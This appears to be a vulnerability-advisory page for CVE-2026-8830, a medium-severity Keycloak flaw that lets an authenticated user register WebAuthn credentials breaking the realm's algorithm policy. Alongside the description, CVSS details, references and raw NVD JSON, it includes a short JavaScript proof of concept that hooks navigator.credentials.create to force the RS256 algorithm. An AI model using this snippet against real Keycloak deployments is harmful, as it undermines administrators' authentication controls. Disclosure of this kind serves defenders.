Security Vulnerability Report
CVE-2026-8830 CVSS 4.3 MEDIUM

CVE-2026-8830

Published: 2026-05-19 07:16:31
Last Modified: 2026-05-19 07:16:31

Description

A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential's parameters, such as public key algorithms, match the realm's configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (see the official advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// Conceptual PoC for CVE-2026-8830
// This script demonstrates how to manipulate the WebAuthn registration request
// to bypass server-side policy checks on public key algorithms.

// 1. Hook into the WebAuthn registration function
const originalCreate = navigator.credentials.create;
navigator.credentials.create = function(options) {
  // 2. Modify the publicKey parameters before sending to the authenticator/server
  // Example: Force a weaker algorithm (e.g., RS256) if ES256 is enforced by policy
  if (options && options.publicKey) {
    console.log("[+] Original publicKey params:", options.publicKey);
    // Attempt to bypass policy by altering acceptable algorithms or extensions
    // Note: The actual bypass depends on specific server validation logic gaps.
    options.publicKey.pubKeyCredParams = [
      { type: "public-key", alg: -257 } // RS256 (COSE algorithm identifier)
    ];
    console.log("[+] Modified publicKey params:", options.publicKey);
  }
  // 3. Proceed with the modified request
  return originalCreate.call(navigator.credentials, options).then(credential => {
    console.log("[+] Credential registered successfully with bypassed params.");
    return credential;
  });
};

// Trigger the registration flow on the target Keycloak instance
// User must be logged in and initiate the "Add Security Key" action.

References

Weakness (from the NVD record on this page): CWE-603
https://access.redhat.com/security/cve/CVE-2026-8830
https://bugzilla.redhat.com/show_bug.cgi?id=2479565

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-8830",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T07:16:30.500",
    "lastModified": "2026-05-19T07:16:30.500",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential's parameters, such as public key algorithms, match the realm's configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-603" }
        ]
      }
    ],
    "references": [
      { "url": "https://access.redhat.com/security/cve/CVE-2026-8830", "source": "[email protected]" },
      { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2479565", "source": "[email protected]" }
    ]
  }
}